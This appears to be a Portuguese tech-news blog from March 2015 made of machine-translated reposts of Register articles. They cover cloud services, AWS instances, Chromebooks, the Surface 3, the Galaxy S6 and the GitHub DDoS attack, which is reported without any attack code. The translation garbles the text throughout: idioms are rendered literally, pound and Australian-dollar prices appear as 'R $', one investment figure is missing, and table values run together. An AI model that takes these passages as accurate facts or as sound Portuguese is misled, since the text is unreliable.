terça-feira, 31 de março de 2015

OpenDaylight e amigos spin up 'CloudRouter Projeto'


Outro dia, outro bafo na rede definida por software (SDN) e / ou função de rede de virtualização (NFV) mercado, desta vez sob a forma de o novo "CloudRouter Project" apoiado por CloudBees, Cloudius Sistemas, IIX, Nginx e OpenDaylight.


O último você provavelmente sabe - é o esforço da Fundação Linux para criar um SDN e / ou pilha NFV padrão. Cloudius é um esforço israelense para criar um sistema operacional muito leve para a implantação bare metal, CloudBees é uma integração contínua jogador, NGINX oferece um servidor web e balanceador de carga, enquanto IIX é uma empresa de peering global.





Este último está conduzindo o Projeto CloudRouter, porque seu diretor sênior de DevOps, e, CloudRouter Projeto chumbo, Jay Turner considera "À medida que a indústria se move para a computação em nuvem, é preciso haver uma ponte entre arquiteturas legadas para SDN, nuvens híbridas e de dados de centro a centro-as conexões de dados ".


Primeiro esforço do grupo é seu para a descarga aqui . A ferramenta é baseada no Fedora e é dito para oferecer os seguintes recursos:



  • capacidade para rodar em infraestruturas de nuvem pública e privada em escala com um sistema de configuração totalmente automatizada

  • container-pronto, incluindo suporte para Docker, Cloudius, OSV e imagens KVM

  • conectividade segura usando sbased-padrão IPSec VPN, SSL ou L2TP

  • monitoramento e relatórios com análise de protocolo de rede integrada para o detalhe de rede a um nível de granulação fina

  • alta disponibilidade e redundância do sistema com failover e sincronização

  • mínimo consumo de recursos


O grupo avalia que essa abordagem "... fornece DevOps para redes (NetOps) com a capacidade de implantar facilmente uma pilha integrada e endurecido."


OpenDaylight tem uma lista de sócios poderoso - apenas sobre qualquer fornecedor que já tenha considerado SDN ou NFV, ou pode significar tanto, assinou como membro - por isso a sua participação neste projeto significa que ele merece ser levado a sério. o projeto também é motivada pelo desejo de oferecer uma alternativa aberta a SDN comercial e NFV, o que significa que ele tem todas as chances de se tornar cada vez mais relevante. ®







via Alimentação (Feed)

AWS falhanços out maciça D para vaporizar grandes plataformas de dados


Big data é um conceito muito bem, mas quando se encontra com o mundo real de comprar kit para executá-lo sobre as coisas podem ficar desagradável, porque o custo dos equipamentos necessários para triturar grandes quantidades de dados pode ser muito considerável.


Alguns fornecedores de dados grandes fazer uma virtude de oferecer seus próprios servidores especializados para o trabalho e os gostos da VMware oferecem maneiras de criar servidores clusters virtuais você pode girar até a fazer alguns dados esmagando quando o espírito move. Alguns operadores de nuvens e / ou provedores de serviços gerenciados combinar as duas abordagens para oferecer aluguel de equipamentos grandes de dados virtuais.





Todos esses modelos agora começar a diversão de competir com a Amazon Web Services (AWS) m, que acaba de criar um novo tipo de instância para o seu serviço de computação elástica (EC2), concebidos para "processamento de vários terabytes conjuntos de dados".


As novas instâncias D2 executados em CPUs Intel Xeon E5-2676 v3 em 2,4 GHz (estourando a 3.0GHz) e vêm em quatro tamanhos, conforme explicado na tabela abaixo.


















































Nome da Instância Contagem vCPU RAM Armazenamento de instância Desempenho da Rede Lido no Disco

(Com 2 MiB Blocks)
Linux On-Demand Preço
d2.xlarge 430,5 GiB6 TB

(3 x 2 TB)
Moderado437 MB / segundo$ 0,690
d2.2xlarge 861 GiB12 TB

(6 x 2 TB)
Alto875 MB / segundo$ 1,380
d2.4xlarge 16122 GiB24 TB

(12 x 2 TB)
Alto1.750 MB / segundo$ 2,760
d2.8xlarge 36244 GiB48 TB

(24 x 2 TB)
10 Gbps3.500 MB / segundo$ 5,520

A instância d2.8xlarge joga em Non-Uniform Memory Access (NUMA) e todos os novos tipos incluem a otimização loja bloco elástico. AWS quer que você use Linuxes mais recentes sobre estes casos, de preferência a sua própria distro, a fim de acessar as velocidades de acesso de armazenamento mais rápidos (graças a novos bits dentro Xen). As novas instâncias D2 dar grandes usuários de dados uma alternativa interessante. Não vai ser por muito tempo, é claro, antes de Google, Microsoft ou um nicho trunfos especificações desses novos sondas. Mas isso não vem ao caso, porque a mera disponibilidade de instâncias de nuvem dedicada a este tipo de aplicação define os gatos entre os pombos em mais um mercado. ®







via Alimentação (Feed)

Coloque esses smartphones longe: Google adiciona medidas anti-copiar para a unidade para o Trabalho


Google tem implementado cinco novas funções destinadas a melhorar acima a segurança, administração e compartilhando características de sua movimentação para suíte negócio nuvem Trabalho e do pacote de educação equivalente.


Vídeo Youtube





"Desde que lançamos movimentação do Trabalho 9 meses atrás, nós assistimos à medida que mais e mais empresas se mudou para a nuvem - e visto que eles priorizam a segurança dos dados, tanto quanto o que fazemos", disse Scott Johnston, diretor de gerenciamento de produto do Google Drive .


"Gartner classifica segurança no topo da lista de preocupações de que as empresas têm sobre a mudança para a nuvem, que é por isso que nós colocamos frente da segurança e no centro de nossos produtos desde o início. E para manter os dados da sua empresa ainda mais seguro na unidade , estamos lançando novos controles de compartilhamento, alertas e eventos de auditoria para o Google Drive para o Trabalho e Google para Educação sobre as próximas semanas ".


No lado da segurança, o novo console de administração na unidade permitirá que os controladores para bloquear certos departamentos de acessar arquivos usando o menu de configurações. Ele também adicionou um recurso de "gestão de direitos de informação" para bloquear arquivos particulares de ser baixado, impresso e copiado.


(É uma coisa boa funcionários determinem não ter ouvido falar de screenshots e câmeras de smartphones.)


Para aliviar a carga sobre os administradores, os usuários da unidade agora pode redefinir suas próprias senhas sem ter que obter um administrador para fazer isso por eles. Hackers podem muito bem com a mudança, uma vez que o torna um pouco mais fácil de projetar seu caminho em contas.


Os administradores podem configurar alertas para acionar quando senhas e configurações de conta são alteradas, falta de começar, e assim por diante. Google dá o exemplo de ser capaz de receber uma notificação se um documento a menção "confidencial" é compartilhado com alguém de fora da empresa.


Esse tipo de compartilhamento através da unidade de nuvem vai ficar muito mais fácil. As novas mudanças incluem a capacidade de passar em torno de documentos com pessoas fora dos grupos de unidade apenas adicionando um endereço de e-mail, e o destinatário será capaz de visualizar arquivos sem qualquer assinatura no Google ou o grupo Drive.


As mudanças vão ser lançados nas próximas semanas, mas Johnston prometeu mais mudanças estão a caminho no final do ano. A equipe está trabalhando em um recurso de acesso que expira que limita o tempo determinados arquivos podem ser compartilhados, e Google também planeja uma expansão de domínios confiáveis ​​para os usuários da unidade. ®







via Alimentação (Feed)

Novas Chromebooks baratíssimo: Team Google mantém bota na garganta de titãs PC


Embora o Google está tentando empurrar Chromebooks sofisticado com a sua Pixel chamativo, seus parceiros de sistema operacional Chrome continuar a orientar os compradores preocupados com o orçamento com um novo lote de dispositivos com preço de US $ 250 e inferior.


Fabricantes de eletrônicos chineses estão levando a última carga, tanto com Haier e Hisense fazer novos Chromebooks disponível para pré-venda começando na terça-feira da Amazon e Walmart.com, respectivamente. Cada listas de dispositivos nuvem-suficientes para apenas 149 dólares.





Ainda este ano, a Asus planeja lançar o primeiro dispositivo Chrome OS conversível, a Flip Chromebook, onde a tela pode ser torcido em torno de modo que ele pode ser usado como um tablet touchscreen. Este modelo será apenas 15mm de espessura e pesa menos de 2 quilos, e estará disponível ainda neste trimestre para $ 249.


No final do ano, a Asus planeja acompanhar a Flip com outro dispositivo em um fator de forma de romance, o Chromebit. Este vai ser um computador OS Chrome auto-suficiente em um dongle que pode se conectar a qualquer monitor via HDMI, onde os usuários fornecem seus próprios teclados e mouses Bluetooth para controlar o dispositivo. Incluirá também uma porta USB 2.0 para uma maior expansão. O preço exato para este dispositivo não estava disponível, mas Asus disse que espera que o varejo por menos de 100 dólares.


Asus Chromebit

Asus 'próximo Chromebit é o menor dispositivo Chrome OS ainda



Sob o capô, os três novos dispositivos são muito semelhantes. Todos são baseados na Rockchip 3288 , um SoC de fabricação chinesa que se casa com quatro núcleos de 2,0 GHz ARM Cortex-A17 - o primeiro produto desse tipo no mundo - com um ARM Mali-T764 GPU quad-core.


Completam as ofertas é o suporte para o conjunto padrão de portas, incluindo USB (apenas 2.0), leitores de cartão, webcams HD de 720p, 802.11ac Wi-Fi e Bluetooth 4.0 com suporte para Smart Ready - embora, obviamente, a pequena Chromebit faltará muitos destes.


Em uma reviravolta incomum nos dias de hoje, a Haier também planeja vender um modelo chamado de Chromebook 11e que irá incluir uma bateria substituível, embora não disse quanto a mais ele vai custar.


Google disse em um post de blog na terça-feira que esses dispositivos em breve será acompanhado por ainda mais Chromebooks de vendedores como Acer, AOpen, Asus, Dell, HP, Lenovo e LG. Estes dispositivos estão previstos para entrar em tamanhos de tela entre 11,6 e 15,6 polegadas, com preços de US $ 199 a $ 499 intervalo.


A própria Fábrica de Chocolate, entretanto, recentemente lançou uma versão atualizada do seu Chromebook Pixel , um laptop Chrome OS touchscreen com qualidade de hardware para rivalizar com o MacBook Air e um preço de US $ 999 para corresponder.


Microsoft rastejando no território do Google?


Parceiros do Google Chromebook pode em breve enfrentar mais concorrência para a extremidade baixa do mercado de PCs, no entanto. Há rumores de que nada menos do que a Microsoft está planejando lançar um par de laptops garra neste verão que irá oferecer a experiência completa do Windows, mas a preços baixíssimos Chromebook.


De acordo com as fofocas da cadeia de fornecimento de Taiwan na DigiTimes, ambas as máquinas terão telas de 11,6 polegadas, mas ao contrário dos dispositivos baseados em Rockchip anunciou na terça-feira, que irá, alegadamente, ser equipado com processadores Intel Bay Trail-T CR Atom Z3735f.


O boato tem-no que um vai ser fabricado para o mercado consumidor pela chinesa 3Nod com um preço inferior alvo de varejo de US $ 149, enquanto o outro será construído por Elitegroup em Taiwan para o mercado de educação e terá um preço inicial de 179 dólares.


Se o scuttlebutt é verdade, não é claro se estes sistemas serão comercializados globalmente ou se eles irão ser limitados aos mercados emergentes. ®







via Alimentação (Feed)

Microsoft lixeiras ARM para Atom com corte de preços de superfície 3 fondleslab


Pic + vid breve flerte da Microsoft com ARM-alimentados tablets Windows RT parece ser sobre: ​​a gigante de Redmond tem revelado o seu mais recente fondleslab, a superfície 3, que é uma lousa-powered Atom dinky executando uma versão completa do Windows em hardware Intel.


Até este mais recente tablet, superfícies têm ostentado processadores ARM-compatível, e Superfície dispositivos Pro usaram chips da Intel. Agora parece que a Microsoft está indo all-Intel.





"Parece ontem que o Surface entrou em cena, mas os produtos que você vê hoje são o resultado de anos de interação através de muitos ciclos de desenvolvimento", disse Panos Panay VP para computação de superfície da Microsoft.


"Nós temos usado esse tempo para ouvir os nossos clientes e para aprender com eles. Nós também construído sobre todo o passado de trabalho de nossas equipes de engenharia, design, software e manufatura, dominando os processos que nos permitem oferecer produtos que sejam tanto linda e incrivelmente poderoso. "


A nova superfície 3 é um dispositivo de 10,8 polegadas, ligeiramente mais pequeno e mais leve do que a superfície 3 da Pro 12 polegadas. No interior, a 14nm processador x7-Z8700 de 1.6GHz Intel quad-core Atom corre de 64 bits do Windows 8.1, e os proprietários serão capazes de atualizar para o Windows 10 para livre no final deste ano . A Microsoft também está empacotando uma assinatura de um ano para a nuvem Office 365 com o dispositivo.


Youtube Video


O Surface 3 tem uma câmera de 3,5 megapixels frontal e uma câmera de 8 megapixels, do outro lado, assim como o 3.0 e Mini DisplayPort tomadas USB de costume e um slot para um cartão microSD. A nova superfície adiciona uma porta microUSB, que pode ser usada para alimentar o dispositivo, em vez da habitual carregador 13W ou para transferir dados a velocidades USB 2.0.


Existem dois modelos - um de 64GB construir com 2GB de RAM por US $ 499 (£ 419 no Reino Unido) e uma versão de 128 GB com 4 GB de RAM por US $ 599, com versões LTE saindo no final do ano por US $ 100 extras, respectivamente. Isso é consideravelmente abaixo da cotação de 799 dólares para uma superfície especificação base de Pro, mas há algumas ressalvas.


O novo tablet não vem com uma caneta, que acrescenta US $ 50, e você também vai precisar de um teclado para usuários sérios, que é outra US $ 130 para o tipo de cobertura. O novo fondleslab também tem um suporte montado na parte traseira que está limitado a três posições, em vez do modelo totalmente ajustável encontrado na construção Pro.


Para aqueles preocupados com o armazenamento, o mais espaçoso dos novos modelos de superfície parece uma aposta melhor. O sistema operacional e software auxiliar ocupa 37GB da superfície e 64GB, enquanto o slot microSD é útil, não é um monte de espaço para brincar, mesmo tendo em conta o terabyte de armazenamento on OneDrive que vem com o Office.


Embora a Microsoft tenha sido fazendo barulhos sobre como atualizar sua linha de Windows RT, é claro desde o anúncio de terça-feira que ARM-alimentado Windows RT está indo na direção de Bob, Zune, Clippy, e Steve Ballmer - idéias que parecia bom no momento, mas mostrou-se desastroso.


Em vez fondleslabs da empresa vão ser máquinas Wintel, e é cheio de gordura do Windows a partir de agora em diante. ®







via Alimentação (Feed)

Big Blue para dar seguradoras de automóveis IoT poderes que espreitam


IBM anunciou que vai gastar US $ bilhões em quatro anos em uma nova unidade de internet de coisas negócio.


A empresa calcula que a internet das coisas rótulo agora se aplica a todas as coisas da cidade inteligente que fez para aplicações de água e de gestão de tráfego nos últimos anos. A idéia parece ser a de tomar esse trabalho, polvilhe um pouco de nuvens e / ou análise de Watson e entregar o que o chamado de IBM "uma plataforma aberta para fornecer aos fabricantes com a capacidade de projetar e produzir uma nova geração de dispositivos conectados que estão melhor otimizado para Internet das coisas, e para ajudar os líderes de negócios em todos os setores criar sistemas que melhor fusível empresa e os dados da Internet das coisas para informar a tomada de decisão. "





Que soa benigna. O plano da empresa para "introduzir um serviço baseado em nuvem que ajuda as empresas de seguros extrair insights de veículos conectados" pode aparecer menos. IBM calcula que este serviço "... permitirá modelos de precificação de novos e mais dinâmicos e da prestação de serviços que podem ser altamente personalizados aos condutores individuais", mas não é difícil imaginar algo acontecendo de errado com isso.


O anúncio da IBM tem o cheiro de bandwagon-Trepar e, ao mesmo tempo que representa uma nova rodada sobre atual analytics nuvem mantra da empresa. Não há menção de 2.000 pessoas sendo dedicados ao esforço IoT, mas pouco sinal se a US $ 3 bilhões é dinheiro novo líquido ou uma re-alocação de dinheiro que essas pessoas teriam gasto de qualquer maneira.


De qualquer maneira, a IBM tem uma abundância de compromissos com uma mancha IoT, então provavelmente tem um pouco mais de credibilidade no campo do que Microsoft. Os esforços de Redmond para convencer mundo + cão que nada a ver com Windows Embedded foi realmente IoT muito antes de qualquer outra pessoa sonhou com a idéia não parece inteiramente convincente , ea posição da Cisco que a IoT é uma mina de ouro, desde que você comprar mais roteadores doesn 't bespeak enorme sinceridade ou gravitas. ®







via Alimentação (Feed)

segunda-feira, 30 de março de 2015

SoftLayer e Telstra no abraço nublado


Telco dominante da Austrália Telstra, que também opera um AU $ 2 bilhões por ano de serviços de TI arn, fechou um acordo para revender do IBM SoftLayer nuvem debaixo e está conversando sobre a tomada do arranjo global.


Telstra e IBM anunciou hoje um novo relacionamento em que os clientes do ex-são oferecidos o acesso à nuvem deste último sobre as redes do ex. Telstra vai revender todas as-a-serviços da SoftLayer, dando a Big Blue uma bela perna-up e os clientes da Telstra outra nuvem para contemplar (o veículo também vai operar vCloud Air na Austrália, tem algumas nuvens de sua própria e é um intercloud Cisco buddy).





A Reg também foi dito por que a IBM e Telstra estão "trabalhando atualmente através dos mecanismos comerciais e operacionais de estender isso para nossos clientes globais." Não há "nenhum prazo específico ainda sobre este assunto."


O que nos traz de volta para que R $ 2 bilhões por ano de serviços de TI braço dentro Telstra, como deve este negócio acontecer ele vai se tornar um, se pequeno, player global em nuvem.


Telstra tem forma trabalhar em estreita colaboração com a IBM - os dois tiveram uma JV serviços no final dos anos 1990 até a Big Blue comprou-o para fora em 2003. Este novo acordo provavelmente não é muito mais do que os dois a olhar para formas de combater o mercado australiano. Mas se ele vai global, que poderia ser interessante. ®







via Alimentação (Feed)

Dia quatro dos web assalto GitHub: Ativistas apontar o dedo para "censura global da China '


Com o GitHub distribuído de negação de serviço (DDoS)-ataque chegando ao quinto dia de bombardeio, o novo-rico de partilha de código disse que está segurando bem debaixo de fogo.


O site disse que a partir de segunda-feira à tarde, horário do Pacífico, ele ainda está operando a 100 por cento, apesar de um fluxo contínuo de tráfego malicioso para os seus servidores. GitHub disse que o ataque "evoluiu", mas não forneceu qualquer informação adicional.





GitHub status page

Página de status do GitHub na segunda-feira



Quando a notícia do assalto quebrou primeiro , pesquisadores de segurança sugeriu meliantes por trás do ataque foram alvo projetos GitHub que ajudam a contornar o Grande Firewall da China - um aparelho de censura que impede o acesso a sites anti-estatais.


Parece um arquivo JavaScript servido por rede de publicidade do Baidu está sendo interceptado por roteadores de borda, e silenciosamente alterada para disparar requisições HTTP repetidas em GitHub.com.


Pessoas, potencialmente milhões, de fora da China visitando sites que usam rede de publicidade do Baidu estão sendo usados ​​para atacar involuntariamente a biz California-sede: seus navegadores silenciosamente bombardear servidores enquanto navega sites que usam rede baseada em China do Baidu.


GitHub reconheceu o ataque parecia ser alvo de "uma classe específica de conteúdo", mas não chegou a apontar o dedo à China.


Grupo campanha anti-censura Greatfire.org disse em um blog postar os ataques são um esforço para encerrar seu projeto GitHub hospedado , e uma extensão de um ataque a grupos anti-censura por parte das autoridades chinesas.


O blog em si parece ser tirado do ar no momento da escrita, junto com o resto do greatfire.org, embora a página em cache mostra a entrada na íntegra.


O post confirma relatos anteriores de que o ataque está sendo realizado pelo código JavaScript malicioso injetado em tráfego Baidu não criptografada.


"A URL para acessar a página GitHub é codificado no JavaScript malicioso", escreve o grupo.


"Nossa página ainda é acessível ... O ataque GitHub ainda está em curso e a JS malicioso ainda está sendo injetado por cerca de 1 por cento de visitantes estrangeiros a sites que estão usando elementos da Baidu."


Greatfire continua a apontar o dedo para os ataques diretamente para a Administração Cyberspace da China (CAC). O grupo argumenta que a CAC está deliberadamente tentando armar sua Great Firewall para executar ataques internacionais.


"Este é um desenvolvimento assustador e as implicações desta ação estender além do controle de informações na internet", escreveu a equipe Greatfire.


"Em um movimento rápido, as autoridades mudaram de aplicação estrita censura na China para impor a censura chinesa em usuários de internet em todo o mundo." ®







via Alimentação (Feed)

Office 365 e Dynamics ir morar na Austrália


Do Office 365 arquivos podem carregar um pouco mais rápido na Austrália hoje, depois que a Microsoft anunciou que ligou o interruptor para a versão local do serviço.


Posto de Redmond decidiu também é a hora certa para servir Dynamics CRM de seus celeiros bit australianos em Sydney e Melbourne.





Tal como a versão local do Azure, os dois aplicativos são certificados para hospedar "sensíveis" não classificados dados do governo, depois de verificados por auditores independentes registrados Programa Assessores do governo australiano.


Antes Microsoft abriu as suas celeiros bit locais, rejeitou as preocupações de latência dizendo o hop extra para Singapura ou outra região não iria fazer a diferença para a experiência do usuário dos australianos. Agora ele está dizendo, em um posto de enlatados por MD locais Pip Marlow, que "Os novos serviços, locais vão proporcionar um desempenho ainda mais rápido, oferecer back-up redundante-geo e ajudar os clientes a resolver considerações residência de dados, especialmente em sectores como a saúde, a educação , o governo e os serviços financeiros. "


É claro que outros abordou o problema antes: famoso acordo do Google com o Estado de New South Wales 'Departamento de Educação vi dados que armazenam on-shore em cerca de 2006, se a memória do seu correspondente está correto.


Vulture do Sul também ouviu um sussurro ou dois no sentido de que, enquanto a Microsoft Austrália foi preparando a versão local do Office 365, aqueles que procuram Azure por muito, muito, grandes plataformas de nuvem foi dito, gentilmente, para que pudessem ser melhor escolher outro região. Talvez isso vai mudar agora que completo da compilação. ®







via Alimentação (Feed)

Viciados em nuvem do Google: Agora você pode manipular seus aplicativos da web a partir do seu smartie Android


Google desenvolvedores que desejam manter um olho em seus processos de nuvem têm agora um aplicativo para Android, apelidado Nuvem Console, que vai permitir o monitoramento remoto de Nuvem Plataforma da Fábrica de Chocolate.


Google Cloud Console

"Imagine estar longe de sua mesa e receber alertas automáticos quando um problema ocorre em seu aplicativo Google App Engine", disse Michael Thomsen, gerente de produto da equipe de Cloud Platform Google em um post de blog .


"Ou espera no aeroporto e parando suas VMs de teste antes de partir para férias. Com o lançamento da versão beta de Nuvem Console para o Android, o gerenciamento Cloud Platform Google a partir do seu telefone ou tablet é possível."





O aplicativo de smartphone mostra problemas de rede de desempenho, uma execução total dos custos de cobrança, bem como o monitoramento de cargas de aplicativos e informações de rede da máquina virtual. Um serviço de monitoramento de nuvem também irá cobrir rastreamento incidente automatizado, e enviar um alerta se os serviços de quebrar limites pré-estabelecidos.


Há também um nível limitado de controle remoto através do aplicativo. Os desenvolvedores podem alterar a versão do App Engine e começar ou terminar uma instância Compute Engine, ou visualizar gráficos para ambos.


Se você é um desenvolvedor com um iPhone, não se desespere: Google tem dito uma versão iOS de Nuvem Console está em desenvolvimento e será lançado quando estiver pronto.


Enquanto o novo app do Google, sem dúvida, ser saudado por alguns, o gigante da publicidade é um pouco por trás do jogo. Usuários da Amazon Web Services tiveram uma versão básica deste tipo de aplicativo (para iOS e Android) desde 2013 e Bezos & Co emitiu a atualização mais recente, no início deste mês. ®







via Alimentação (Feed)

365 clientes do Office obter gratuitamente recursos de disputas do dispositivo


Microsoft começou a agregação gerenciamento de dispositivos móveis (MDM) de capacidades básicas com todos os comerciais do Office 365 assinaturas, como ele disse que iria na conferência TechEd Europa do ano passado.


A partir de segunda-feira, as empresas com Office 365 Business, Enterprise, EDU, ou assinaturas Governo pode gerenciar os recursos dispositivos de telefone Android, iOS e Windows sem nenhum custo adicional.





Isso inclui a capacidade de definir políticas de segurança para que somente os dispositivos compatíveis com permissão para acessar o Office 365 documentos e e-mail. Dispositivos desbloqueados podem ser bloqueados, por exemplo.


Administradores podem também gerar relatórios mostrando que teve acesso ao que de dados e de quais dispositivos, e eles podem até mesmo realizar limpezas seletivos de dispositivos dos funcionários, onde os dados do Office 365 é apagado, mas dados pessoais continua no lugar.


Redmond não é exatamente dar afastado da fazenda, no entanto. Embora o Office 365 assinaturas de oferecer esses recursos de MDM rudimentares, funções mais avançadas estão em falta - a capacidade de gerenciar PCs com Windows com qualquer granularidade sendo a omissão mais notável.


E, por enquanto, pelo menos, os recursos de gerenciamento de dispositivos de escritório 365 trabalham melhor com iPhones e iPads. De acordo com um documento do TechNet , os lotes de capacidades que funcionam no iOS não estão disponíveis no Android ou (curiosamente) Windows Phone 8.1.


Para opções mais abrangentes de gerenciamento de dispositivo, Microsoft prestativamente sugere que você se inscrever para a sua Intune serviço, que oferece gerenciamento de aplicativos móveis e melhor controle dos PCs, entre outras características.


"Isso inclui a capacidade de restringir ações, tais como cortar, copiar, colar e salvar como para aplicativos gerenciados por Intune - ajudando a manter as informações corporativas ainda mais seguro", gerente de produto do Microsoft Shobhit Sahay explicou em um post no blog .


Recursos livres do MDM do Office 365, por sua vez, começou a implantar-se em mercados selecionados na segunda-feira e estará disponível em todo o mundo nos próximos quatro a seis semanas. ®







via Alimentação (Feed)

Galaxy S6 e S6 Borda nas garras de abutre: encontramos olhares e cérebros


Se foi para a beleza e inteligência com o seu novo Galaxy S6 e S6 Borda primeiro olhar Samsung, mas não caiu na armadilha de estilo sobre a substância.


S5 do ano passado embalado todos os tipos de recursos em um pacote de aparência cansada e quando o telefone foi um tecnológica maravilha , não foi fácil no olho e não definiu o pulso acelerado.





Ambos os modelos S6 cuidar de ambos os problemas. O S6 tem um acabamento fosco atraente, alguns aviões bem esculpidas em seus lados e uma tela de alto brilho que levou meia hora de manusear a suja. O modelo preto, em particular, se sente como algo novo, como em certos ângulos, parece que não há espaço entre a última linha de pixels da tela e painel. Isso tira falta de bordadura preta faz com que o aparelho se sentir melhor-engenharia. É um pacote impressionante.


Minha reação inicial ao S6 Borda foi heft-lo em alguns aspectos, porque a tela curvada significava que eu precisava para aprender a mantê-lo de forma segura. Entre o copo de volta e os lados curvos o meu domínio sobre o fone senti um pouco precária. Poucos minutos e eu poderia começar a entusiasmar sobre o Edge. Os próprios bordas curvas são truques: o relógio e indicadores básicos aparece lá, se você esfregue-o para trás e para a frente, o estilo de lanterna mágica, e não há há uma interface que permite o acesso a um de cinco contatos favoritos. Nem característica é um criador de mercado. Mas o Edge pode ser apenas porque é um bom avanço na forma de placas padrão que tem vindo a dominar o mercado de smartphones.


Na Austrália, você vai pagar AU $ 1149 para o Edge, contra R $ 999 para o S6 de baunilha. Isso é um grande prémio para uma característica principalmente estético.


Samsung fez algumas mudanças dignas de interface com o usuário dos telefones. Minha reação em cima usando o S4 e S5 foi direto para uma loja de aplicativos, a fim de instalar Nova Lançador de modo a evitar mistos metáforas de interface de usuário. Eu, felizmente, vou pular essa etapa se um S6 torna-se meu telefone principal, porque o UI agora omite a estranha mistura de azulejos meia tela e em grade ícones click-to-lançamento. Um novo "Smart Manager" (descrito acima) tipifica a nova abordagem de torná-lo mais fácil de encontrar informações do sistema, configurações e aplicativos.


Icons ter sido dado um bom refresh e agora pode-se instalar temas que substituem fontes e ícones com um novo look and feel. O punhado instalado nos aparelhos I amostradas em uma prensa de almoço hoje tendeu para o desenho animado, mas não fez o padrão Samsung definir olhar um pouco cansado.


Som era bom no S6 e The Edge. Pequenos alto-falantes dos telefones não se prestam para áudio grande, mas você não vai perder a melodia de uma música pop, mesmo que você quer saber apenas que tipo de percussão está sendo jogado. As telas são lixados para um alto brilho e desempenho impressionante: eu assistir a um filme sobre o trem para o trabalho, sem queixas sobre o vídeo.


Ambos os aparelhos foram bem sensível, embora seja difícil dizer se o novo eight-core Samsung chippery é a razão ou se as minhas atuais aparelhos anos de idade, está sofrendo de sujeira acumulada. As entranhas, no entanto, aquecer em uma pressa. E meia hora de picar um S6 Borda bateu dez por cento fora da capacidade da bateria. Isso pode ser um problema porque o S6 não mais oferece uma bateria removível, nem um slot para cartão micro SD. Samsung avalia rápido carregamento modo cuida da primeira edição, oferecendo uma prometidos quatro horas de uso após dez minutos de solavancos. 100GB de empacotado, free-for-de dois anos OneDrive armazenamento em nuvem é dito ser o remédio para o slot de expansão em falta. Samsung faz essa afirmação após a primeira assumindo que você tem um LTE e / ou conexão com a abundância de subsídio de download de sobra.


No geral, o S6 se sente como um upgrade sólido que enfatiza a facilidade de utilização, funções de aptidão não obscuros ou eye-tracking bobo. O S6 Edge oferece uma experiência um pouco diferente, para a primeira meia hora, pelo menos, e uma aparência mais suave que irá agradar a muitos. Vai ser interessante ver como ele se desgasta com o tempo.


Será que vão ser hits? Meu instinto sugere o S6 e Edge será melhor recebido do que o S5. Os aparelhos são mais elegantes do que o seu predecessor e oferecer uma melhor integração Android. Se pregado o consumo de energia da Samsung, também, não há razão para os telefones não vai se tornar muito popular. ®







via Alimentação (Feed)

domingo, 29 de março de 2015

Flicks AWS mudar para a replicação de armazenamento em nuvem


Amazon Web Services (AWS) fez algo bastante útil para o seu serviço de armazenamento simples (S3), ou seja, fazendo o possível para replicar dados entre as regiões.


Para os não iniciados, S3 é um serviço de armazenamento em nuvem que permite aos usuários para encher o material para a nuvem, e até mesmo escolher uma "região", onde ele vai pousar. AWS opera nove regiões S3 * em todo o mundo e, enquanto eles estão todos mais ou menos equivalente, o mais próximo que você normalmente oferece latência superior, ou podem residir em uma jurisdição que atenda às suas exigências de conformidade.





S3 tem, até agora, forçou os usuários a escolher uma região para seus dados.


Mas a empresa já ligado um novo recurso chamado "Cross-Região de replicação", que faz o que diz na lata: replicar dados entre as regiões da companhia.


O novo recurso parece muito simples: você pode definir uma política e seu balde S3 passarão a replicar os dados que contém a uma segunda região. Você poderia, por isso, escolher replicar entre a Irlanda e Sydney, o que significa uma greve meteorito hipotético mid-Atlantic, que tirou os EUA ea Europa iria deixá-lo capaz de atender os clientes asiáticos. Para o ano ou dois antes que a nuvem de poeira mata as culturas e leva a fome em massa, de qualquer maneira.


O serviço de replicação está disponível agora. ®


* regiões S3 pode ser encontrada em US (standard), Oregon e Califórnia do Norte, Irlanda, Frankfurt, Cingapura, Sydney, Tóquio, São Paulo







via Alimentação (Feed)

sábado, 28 de março de 2015

O Windows 10 compilação lista SNOWBALLS da Microsoft para o Lumia mobes


Microsoft começou por abriram suas janelas 10 Technical Preview para mais telemóveis, após a sua lista inicial de volta em fevereiro tinha sido extremamente limitado.


A gigante do software Gabe Aul disse em um post no blog na sexta-feira que o seu constrói-for-mobes lista era preliminar. "[A] s Insiders do Windows eu queria dar-lhe a visibilidade, mesmo quando não é 100 por cento bloqueado", disse ele.





Sem surpresa, a saunaload de modelos Lumia foram agora arremessou sobre a pilha.


Um conjunto maior de telefones estão agora na lista, porque - Aul explicou - Microsoft tem quase resolvido a sua função chamada "partição de costura", que aparentemente permitiria Redmond "para re-size a partição do sistema de forma dinâmica" e, assim, abrir o construir a mais mobes.


Aul, no entanto, permaneceu firme em manter datas de envio previstos para novas construções em segredo. Ele disse:



[W] e se sentir bem aqui sobre o código de partição costura e atual constrói, mas provavelmente ainda tem pelo menos mais uma semana de engenharia para fazer para que possamos obter uma grande compilação para a lista expandida de dispositivos.



Aul também alertou que, se um erro é visto em um dispositivo específico, então ele irá posteriormente ser arrancado fora da lista, que se agiganta a seguir:



  • Lumia 1020

  • Lumia 1320

  • Lumia 1520

  • Lumia 520

  • Lumia 525

  • Lumia 526

  • Lumia 530

  • Lumia 530 Dual Sim

  • Lumia 535

  • Lumia 620

  • Lumia 625

  • Lumia 630

  • Lumia 630 Dual Sim

  • Lumia 635

  • Lumia 636

  • Lumia 638

  • Lumia 720

  • Lumia 730

  • Lumia 730 Dual SIM

  • Lumia 735

  • Lumia 810

  • Lumia 820

  • Lumia 822

  • Lumia 830

  • Lumia 920

  • Lumia 925

  • Lumia 928

  • Lumia ICON

  • Microsoft Lumia 430

  • Microsoft Lumia 435

  • Microsoft Lumia 435 Dual SIM

  • DTV Microsoft Lumia 435 Dual SIM

  • Microsoft Lumia 532

  • Microsoft Lumia 532 Dual SIM

  • Microsoft Lumia 640 Dual SIM

  • Microsoft Lumia 535 Dual SIM


Aul prometeu que o teste do código partição costura da Microsoft permitiria à empresa para "apoiar muito mais telefones para o próximo vôo." ®







via Alimentação (Feed)

$ 23 milhões para uma biz WordPress? Por hospedagem top-end é muito dinheiro


Análise de site de hospedagem pode não ser a primeira coisa que você considerar quando se olha para o crescimento da indústria de tecnologia, mas os capitalistas de risco North Bridge estão apostando diferente.


Esta semana, o biz investimento afundou $ 23 milhões (R $ 15.4m) em WP Motor , uma empresa de hospedagem em Austin, Texas, que é especializada no WordPress open-source software de publicação online. North Bridge deu WP Motor US $ 15 milhões (R $ 10 milhões) pouco mais de um ano atrás.





